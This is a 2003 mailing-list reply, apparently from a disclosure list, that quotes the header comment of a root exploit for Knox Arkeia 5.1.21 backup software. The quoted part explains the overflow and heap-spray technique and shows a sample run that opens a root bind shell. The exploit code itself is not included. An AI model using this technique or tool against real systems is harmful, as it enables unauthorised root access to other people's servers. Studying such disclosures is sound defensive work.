From: dlhane at sbcglobal.net (David Hane)
Subject: Knox Arkeia 5.1.21 local/remote root exploit

Have you tested this on other versions?

DH

On Friday 19 September 2003 10:36, A. C. wrote:
> Exploit attached for Knox Arkeia Pro v5.1.21 backup
> software from http://www.arkeia.com.
>
> /*
>  * Knox Arkeia arkiead local/remote root exploit.
>  *
>  * Portbind 5074 shellcode
>  *
>  * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
>  *
>  * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
>  * A previous request forces a large allocation of NOP's + shellcode in heap
>  * memory.  Find additional targets by searching the heap for NOP's after a
>  * crash.  safeaddr must point to any area of memory that is read/writable
>  * and won't mess with program/shellcode flow.
>  *
>  * ./ark_sink host targetnum
>  * [user@...t dir]$ ./ark_sink 192.168.1.2 1
>  * [*] Connected to 192.168.1.2:617
>  * [*] Connected to 192.168.1.2:617
>  * [*] Sending nops+shellcode
>  * [*] Done, sleeping
>  * [*] Sending overflow
>  * [*] Done
>  * [*] Sleeping and connecting remote shell
>  * [*] Connected to 192.168.1.2:5074
>  * [*] Success, enjoy
>  * id
>  * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
>  *
>  *
>  */

